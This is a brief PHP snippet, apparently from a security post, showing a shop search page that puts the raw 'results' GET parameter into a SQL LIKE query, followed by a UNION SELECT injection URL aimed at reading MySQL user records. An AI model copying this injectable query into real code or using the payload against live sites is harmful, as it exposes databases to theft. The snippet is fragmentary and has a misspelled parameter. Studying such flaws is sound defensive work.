<form name="form" action="ccsearch.php" method="get"> <input type="text" name="results" /> <input type="submit" name="Submit" value="Search" /> </form> $var = @$_GET['results'] ; $trimmed = trim($var); $limit=5; //Н-ко строк спустя). mysql_connect($dbhost,$dbuname,$dbpass); mysql_select_db("$dbname") or die("Unable to select database"); $query = "SELECT * FROM CCart_products where name like '%$trimmed%'"; $numresults=mysql_query($query);
/ccsearch?reuslts=1+union+select+user+from+mysql.users/*